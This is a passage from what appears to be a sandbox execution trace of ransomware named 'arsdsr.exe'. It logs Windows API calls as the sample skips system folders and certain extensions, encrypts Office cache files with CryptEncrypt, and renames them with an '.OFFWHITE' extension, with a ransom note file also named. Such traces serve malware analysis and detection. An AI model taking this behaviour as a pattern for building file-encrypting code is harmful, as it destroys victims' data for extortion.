pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0086.137] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.137] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.137] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0086.138] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x741, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.138] SetLastError (dwErrCode=0x0) [0086.138] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.181] GetLastError () returned 0x0 [0086.181] GetLastError () returned 0x0 [0086.181] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x841, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.182] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.182] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x941, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.182] WriteFile (in: hFile=0x21c, lpBuffer=0x547c58*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547c58*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0086.182] GetProcessHeap () returned 0x500000 [0086.182] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x741) returned 0x546980 [0086.182] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.182] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x741, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x741, lpOverlapped=0x0) returned 1 [0086.182] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.182] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x741, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x741, lpOverlapped=0x0) returned 1 [0086.182] GetProcessHeap () returned 0x500000 [0086.182] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0086.182] CloseHandle (hObject=0x21c) returned 1 [0086.183] GetProcessHeap () returned 0x500000 [0086.183] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0086.183] GetProcessHeap () returned 0x500000 [0086.183] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0086.183] GetProcessHeap () returned 0x500000 [0086.183] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0086.183] GetProcessHeap () returned 0x500000 [0086.183] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0086.183] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" [0086.184] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.OFFWHITE" [0086.184] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.offwhite")) returned 1 [0086.184] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1 [0086.184] lstrcmpiW (lpString1="msvcr90.dll", lpString2=".") returned 1 [0086.184] lstrcmpiW (lpString1="msvcr90.dll", lpString2="..") returned 1 [0086.184] lstrcmpiW (lpString1="msvcr90.dll", lpString2="...") returned 1 [0086.184] lstrcmpiW (lpString1="msvcr90.dll", lpString2="windows") returned -1 [0086.184] lstrcmpiW (lpString1="msvcr90.dll", lpString2="$recycle.bin") returned 1 [0086.184] lstrcmpiW (lpString1="msvcr90.dll", lpString2="rsa") returned -1 [0086.184] lstrcmpiW (lpString1="msvcr90.dll", lpString2="ntuser.dat") returned -1 [0086.184] lstrcmpiW (lpString1="msvcr90.dll", lpString2="programdata") returned -1 [0086.184] lstrcmpiW (lpString1="msvcr90.dll", lpString2="appdata") returned 1 [0086.184] lstrcmpiW (lpString1="msvcr90.dll", lpString2="program files") returned -1 [0086.184] lstrcmpiW (lpString1="msvcr90.dll", lpString2="program files (x86)") returned -1 [0086.184] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.184] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="msvcr90.dll" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" [0086.185] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.185] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.185] PathFindExtensionW (pszPath="msvcr90.dll") returned=".dll" [0086.185] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0086.185] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0086.185] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0086.185] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0086.185] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0086.185] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0086.185] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0086.185] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0086.185] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1 [0086.185] lstrcmpiW (lpString1="OfficeLR.cab", lpString2=".") returned 1 [0086.185] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="..") returned 1 [0086.185] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="...") returned 1 [0086.185] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="windows") returned -1 [0086.185] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="$recycle.bin") returned 1 [0086.185] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="rsa") returned -1 [0086.185] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="ntuser.dat") returned 1 [0086.185] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="programdata") returned -1 [0086.185] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="appdata") returned 1 [0086.185] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="program files") returned -1 [0086.185] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="program files (x86)") returned -1 [0086.185] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.185] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="OfficeLR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" [0086.185] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.185] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.185] PathFindExtensionW (pszPath="OfficeLR.cab") returned=".cab" [0086.185] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0086.185] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0086.185] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0086.185] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1 [0086.185] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2=".") returned 1 [0086.185] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="..") returned 1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="...") returned 1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="windows") returned -1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="$recycle.bin") returned 1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="rsa") returned -1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="ntuser.dat") returned 1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="programdata") returned -1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="appdata") returned 1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="program files") returned -1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="program files (x86)") returned -1 [0086.186] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.186] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="OfficeMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" [0086.186] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.186] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.186] PathFindExtensionW (pszPath="OfficeMUI.msi") returned=".msi" [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0086.186] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0086.186] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OfficeMUI.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2=".") returned 1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="..") returned 1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="...") returned 1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="windows") returned -1 [0086.186] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="$recycle.bin") returned 1 [0086.187] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="rsa") returned -1 [0086.187] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="ntuser.dat") returned 1 [0086.187] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="programdata") returned -1 [0086.187] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="appdata") returned 1 [0086.187] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="program files") returned -1 [0086.187] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="program files (x86)") returned -1 [0086.187] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.187] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="OfficeMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" [0086.187] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.187] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.187] PathFindExtensionW (pszPath="OfficeMUI.xml") returned=".xml" [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0086.187] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0086.187] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0086.187] GetProcessHeap () returned 0x500000 [0086.187] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547c68 [0086.187] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0086.188] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=5557) returned 1 [0086.188] GetProcessHeap () returned 0x500000 [0086.188] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0086.188] GetProcessHeap () returned 0x500000 [0086.188] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0086.188] GetProcessHeap () returned 0x500000 [0086.188] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0086.188] GetProcessHeap () returned 0x500000 [0086.188] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0086.188] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.188] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.188] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0086.188] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.188] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.188] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0086.188] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.188] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.188] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0086.188] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.188] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.188] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0086.189] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.189] SetLastError (dwErrCode=0x0) [0086.189] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.218] GetLastError () returned 0x0 [0086.218] GetLastError () returned 0x0 [0086.218] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x16b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.218] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.218] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x17b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.218] WriteFile (in: hFile=0x21c, lpBuffer=0x547c68*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547c68*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0086.218] GetProcessHeap () returned 0x500000 [0086.218] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15b5) returned 0x5537b0 [0086.218] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.218] ReadFile (in: hFile=0x21c, lpBuffer=0x5537b0, nNumberOfBytesToRead=0x15b5, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5537b0*, lpNumberOfBytesRead=0x295e540*=0x15b5, lpOverlapped=0x0) returned 1 [0086.259] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.259] WriteFile (in: hFile=0x21c, lpBuffer=0x5537b0*, nNumberOfBytesToWrite=0x15b5, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5537b0*, lpNumberOfBytesWritten=0x295e54c*=0x15b5, lpOverlapped=0x0) returned 1 [0086.259] GetProcessHeap () returned 0x500000 [0086.259] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5537b0 | out: hHeap=0x500000) returned 1 [0086.259] CloseHandle (hObject=0x21c) returned 1 [0086.260] GetProcessHeap () returned 0x500000 [0086.260] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0086.260] GetProcessHeap () returned 0x500000 [0086.260] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0086.260] GetProcessHeap () returned 0x500000 [0086.260] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0086.260] GetProcessHeap () returned 0x500000 [0086.260] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0086.260] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" [0086.260] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.OFFWHITE" [0086.260] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.offwhite")) returned 1 [0086.261] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0086.261] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2=".") returned 1 [0086.261] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="..") returned 1 [0086.261] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="...") returned 1 [0086.261] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="windows") returned -1 [0086.261] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="$recycle.bin") returned 1 [0086.261] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="rsa") returned -1 [0086.261] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="ntuser.dat") returned 1 [0086.261] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="programdata") returned -1 [0086.261] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="appdata") returned 1 [0086.261] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="program files") returned -1 [0086.261] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="program files (x86)") returned -1 [0086.261] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.261] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="OfficeMUISet.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" [0086.261] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.261] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.261] PathFindExtensionW 